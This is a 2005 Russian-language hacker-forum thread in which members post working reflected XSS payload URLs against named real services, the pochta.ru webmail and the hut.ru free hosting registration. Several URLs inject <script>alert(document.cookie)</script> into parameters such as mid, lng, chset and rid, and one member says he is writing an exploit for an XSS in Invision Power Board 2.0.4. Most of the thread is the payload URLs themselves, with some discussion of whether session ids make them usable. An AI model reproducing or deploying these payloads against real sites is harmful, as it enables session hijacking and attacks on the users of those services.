XSS почта.ру, hut.ru

Discussion in 'Уязвимости' started by m0nzt3r, 25 Jun 2005.

  1. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    1) Нашел на почта.ру вот
    Code:
    http://www.pochta.ru/info.php?lng=&mid="><script>alert('XSS by m0nzt3r');</script>
    если ее ктото находил уже то извиняюсь...
    2) и еше один на hut.ru (это бесплатный хостинг)
    Code:
    http://register.hut.ru/cgi-bin/sp.cgi?fqdn="<script>alert('XSS by m0nzt3r');</script>
    =))
    недаром говорят что все бесплатное бывает дыряво..
     
  2. KLez

    KLez r00t

    Joined:
    17 May 2005
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    я на Ipb 2.0.4 нашел Xss пока сейчас пишу сплоит на него !
    Думаю наднях будет релиз и видео
     
  3. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Во! молодец значит 2.0.4 тож дырявая..на чем пишешь сплойт и как далеко можно использовать эту багу?
     
  4. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    на Xss сплоит????
    Странно а сплоит для чего не понял?
    Или он будет админа заманивать? =)
     
  5. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Morph, под сплойтом в данном случае имеется ввиду полноценный скрипт.
     
  6. KLez

    KLez r00t

    Joined:
    17 May 2005
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    PinkPanther ага ты прав. Думаю на днях опубликую багу =)
     
  7. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    А терь понял ступил малась =))
    ИМХО.Но все же не сплоит тогда код уж.
     
  8. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
  9. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    эээ Клез а я обрадовался ))))))) это когда в админке добавяешь форумы то в комментах к ним теги не фильтрируются =))) так как комменты можно писать из админки то следовательно для проведения хсс надо быть админом )) а если ты админ то нафиг тебе хСС?))))))))))) у меня прошло на 2.0.3 нуленой версии у Клеза на 2.0.4 наверно есть во всех версиях ))
     
    #9 m0nzt3r, 13 Jul 2005
    Last edited: 13 Jul 2005
  10. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    http://www5.pochta.ru/list.php?id=N...ent.cookie%29%3C%2Fscript%3E&bt_create=%CE%EA

    http://www3.pochta.ru/list.php?lng=en&id=N71e37161bc49873482fcf68b3e497f5&aid=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&rid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://www10.pochta.ru/mailbox.php?lng=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&id=Nd558588a9be04bfdf2a54ea6ea0ce32

    http://www10.pochta.ru/mailbox.php?id=Nd558588a9be04bfdf2a54ea6ea0ce32&chset=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://www10.pochta.ru/info.php?sid=&lng=&mid=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E

    http://www10.pochta.ru/regform.php?sid=3beff5fe76e261870e27716b82a73162&lng=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&rnd=%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
  11. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    а ты не подумал что мы не сможем это просмотреть=))))сессиЯ)
     
  12. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    Там пофигу пройдет так что никаких сессий =)
    Так что все путем =)
    Все нормально смотриться!
     
    1 person likes this.
  13. kir0k

    kir0k New Member

    Joined:
    24 Jul 2005
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Нифига, скрипт выполнится только если значение id
    верное. А его уже не перехватишь...
    Так что дырка абсолютно бесполезная.
     
  14. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    хехе
    Ну я же не говорил что ими мона что то угнать тема была XSS pochta.ru
    Вот я и выложил а пасивыне или активные никто не спрашивал.
     
  15. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    А почему здесь:
    (document.cook ie)
    В середине слова cookie стоит пробел?
    А в других ссылках на XSS ОТ Морфа пробел не ставится?
    Что-то с форумом?
     
  16. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    Нет это случайно вышло в блокноте валялось вот и развалилось а так без пробела должено быть =)
     
  17. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    Знаю, что без пробела Вот я написал без пробела, а получилось с пробелом !!!! Сам смотри ))) Чё за нах...???)))

    http://www10.pochta.ru/mailbox.php?lng=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E&id=Nd558588a9be04bfdf2a54ea6ea0ce32
     
  18. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    Так задуманно =)